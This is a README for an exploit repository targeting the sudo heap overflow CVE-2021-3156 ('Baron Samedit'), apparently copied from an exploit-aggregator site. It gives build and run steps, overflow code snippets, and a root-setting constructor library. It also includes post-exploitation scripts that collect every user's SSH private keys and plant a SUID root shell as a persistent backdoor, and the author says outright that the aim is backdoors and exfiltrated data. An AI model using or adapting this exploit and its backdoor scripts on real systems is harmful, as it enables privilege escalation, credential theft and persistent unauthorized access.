Share
## https://sploitus.com/exploit?id=6D615941-1400-5F6E-8B84-68AB306EAAD4
# PE_CVE-CVE-2021-3156
Exploit for Ubuntu 20.04 using CVE-2021-3156, enhanced with simple and automated post-exploitation scripts

Besides the root shell you can have:

-A .txt file with all the id_rsa ssh keys configured in the server. See the script: 
[get_all_ssh_keys.sh](https://github.com/PurpleOzone/PE_CVE-CVE-2021-3156/blob/main/get_all_ssh_keys.sh)


-A privshell executable that allows any user to start a root shell (working on fixing the gcc error). See the script: 
[create_privshell.sh](https://github.com/PurpleOzone/PE_CVE-CVE-2021-3156/blob/main/create_privshell.sh)


## PoC for the PE_CVE-CVE-2021-3156.

### Requirements

In order to have a successful result, it is necessary that the victim machine has one of the following versions of OS and Sudo: 
 
 -Ubuntu 20.04 (Sudo 1.8.31)
 
 -Debian 10 (Sudo 1.8.27)
 
 -Fedora 33 (Sudo 1.9.2)

 
![image](https://github.com/PurpleOzone/PE_CVE-CVE-2021-3156/assets/111320119/6cdd3ad0-34af-4b29-81d9-838c757b046f)

In order to make my VM vulnerable, I downgraded my verision of sudo with the following command:
```
$ sudo apt install sudo=1.8.31-1ubuntu1
```

### Exploit

The exploit can work as long as access to the victim system is gained with a user without considerable privileges.

![image](https://github.com/PurpleOzone/PE_CVE-CVE-2021-3156/assets/111320119/b86c0ad5-32bf-4b9e-9270-a0c3a1434dc7)

You can clone the repo to the victim´s machine or in your local machine and load it with ***wget***

![image](https://github.com/PurpleOzone/PE_CVE-CVE-2021-3156/assets/111320119/064ba0d1-88be-4347-b20f-08dc80fc7747)

Execute the command "make" to compile the .c files according to the vulnerability
![image](https://github.com/PurpleOzone/PE_CVE-CVE-2021-3156/assets/111320119/8d486f7e-7c06-456c-be71-1ec5e775e64b)

You´ll get the exploit file, so you can run it with "./"
After you run the exploit, we can now see two files generated in the repository, one that holds all the ssh keys registered on the system and the other hold the executable SUID file that grants a root session to all users. (highlighted in purple)

![image](https://github.com/PurpleOzone/PE_CVE-CVE-2021-3156/assets/111320119/cdc903a9-2c55-4596-a2c5-2e3ea9f02d31)

You might see an error like the following one:

![image](https://github.com/PurpleOzone/PE_CVE-CVE-2021-3156/assets/111320119/2dcb86bf-d1b7-4c62-87a5-fc23b084431a)

I'm still trying to solve the error, but I assume it's the shell that generates the exploit. I tried running the ***./create_privshell.sh*** command from root by accessing with ***sudo su*** from a user with appropriate permissions and the script compilation was fine. Alternatively it can be compiled on a different machine and copied over to the victim, that´s why the existence of a wget request.

The script to compile is the following:

```
echo 'int main() { setresuid(0,0,0); system("/bin/sh"); }' > privshell.c
gcc -o privshell privshell.c
rm privshell.c
chown root:root privshell
chmod u+s privshell
```
You can now read the .txt files with all de ssh keys and use the privshell until I fix the gcc error
![image](https://github.com/PurpleOzone/PE_CVE-CVE-2021-3156/assets/111320119/3a30fa3d-9d88-4080-9120-a1caa3f7d5b4)

## ABOUT CVE-2021-3156.
Dicovered by [Qualys](https://blog.qualys.com/vulnerabilities-threat-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit)
	
***CVSS score of 7.8***

CVE-2021-3156, also known as the "Baron Samedit" vulnerability, is a security vulnerability that affects the widely used sudo program on Unix-based operating systems. Sudo is a program that allows users to run commands with elevated privileges, usually by entering their own password or a root password. The vulnerability is caused by a buffer overflow issue in the sudo command's "sudoedit" feature, which allows users to edit files with elevated privileges. 
The vulnerability was first discovered in January 2021 by Qualys Research Labs, and it affects sudo versions from 1.8.2 to 1.8.31p2 and 1.9.0 to 1.9.5p1.

###Very very technical details
Info from: [Qualys](https://blog.qualys.com/vulnerabilities-threat-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit)

![image](https://github.com/PurpleOzone/PE_CVE-CVE-2021-3156/assets/111320119/72774daf-096c-47d5-849e-ec1b11ced8d9)

![image](https://github.com/PurpleOzone/PE_CVE-CVE-2021-3156/assets/111320119/942f8c2c-9d1a-44de-91bc-2ce0d3e8c15d)

![image](https://github.com/PurpleOzone/PE_CVE-CVE-2021-3156/assets/111320119/a0875f23-8363-44bc-8a99-df9c3af679a2)


In other words, set_cmnd() is vulnerable to a heap-based buffer overflow, because the out-of-bounds characters that are copied to the “user_args” buffer were not included in its size (calculated at lines852-853).

For the overflow part, I used the  [redhawkeye/sudo-exploit](https://github.com/redhawkeye/sudo-exploit) exploit.c file

It is a bit complex but easily interpretable.

```c
 char *env[] = {
        "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
        "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
        "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
        "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
        "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
        "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
        "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
        "\\", "\\", "\\", "\\", "\\", "\\", "\\",
        "X/X",
        concat("LC_ALL=C.UTF-8@", str_repeat('A', 0xd0)),
        NULL
    };
```
This part declares an array of environment variables env that will be passed to the execve system call. The environment variables contain a series of backslashes and a specially crafted variable called LC_ALL which has the value "C.UTF-8@" concatenated with 208 (0xd0) A characters.The C.UTF-8@ value will be passed as the LC_ALL environment variable to the sudoedit command. The 208 A characters are used to overflow a buffer in the sudoedit program and execute arbitrary code.

```c
  char * a = concat(str_repeat('A', 0x70),"\\");
    char * argv[] = {"/usr/bin/sudoedit", "-s", a, NULL};
    execve(argv[0], argv, env);
```
This part declares a variable a that contains a string of 112 (0x70) A characters, followed by a backslash. It then declares an array argv that will be passed to execve. The array contains the path to the sudoedit command (/usr/bin/sudoedit), the -s flag, and the a variable create above.

```c
  execve(argv[0], argv, env);
```

This is the execve system call that actually runs the sudoedit command with the provided arguments and environment variables. The sudoedit program will read the LC_ALL environment variable and attempt to parse it as a file path. The overflowing A characters will be used to write arbitrary data to memory and potentially execute arbitrary code.

So this data in memory reserved for the RCE is going to be used by our file shell_tool.c

```c
__attribute((constructor))
static void sice() {
    setuid(0);
    system("command");
    ...
    system("bash");
 ```

This part of the code declares a function named sice with the ***__attribute__((constructor))*** attribute, so the function will be automatically called when the program starts running, before main() is executed.Inside the sice function, the setuid(0) function is called to set the effective user ID of the process to 0, which is the user ID of the superuser or root. This effectively gives the program root privileges. After that, just using with the argument system("command"), we can do anything we want before the root session appears in the terminal, that´s why I wanted to try the scripting
thing, in order to have some backdors and data exfiltrated before we get the root shell.


I tried to code my own version of the code called ***mybufferof.c***, basically is pretty similar, so feel free to modify the Makefile to test it jeje 


### About the Makefile

```
all:
	gcc bufferof.c -o exploit
	mkdir libnss_X
	gcc -g -fPIC -shared shell_tool.c -o libnss_X/X.so.2
 ```
First we need to compile our exploit and then create the dir "libnss_X". Then the last command compiles the shell_tool.c file and creates a shared object file named X.so.2 in the libnss_X directory:

The -g flag generates debug information for the shared object file.

The -fPIC flag generates position-independent code for shared objects.

The -shared flag specifies that a shared object file should be created.

The resulting shared object file X.so.2 is placed in the libnss_X directory created in the second step.

This is important for the CVE, because of this:

![image](https://github.com/PurpleOzone/PE_CVE-CVE-2021-3156/assets/111320119/b8ac6ceb-3e4e-4b9f-908c-2e5a4126d734)

Data from:[Qualys](https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt)

That´s all, enjoy, I guess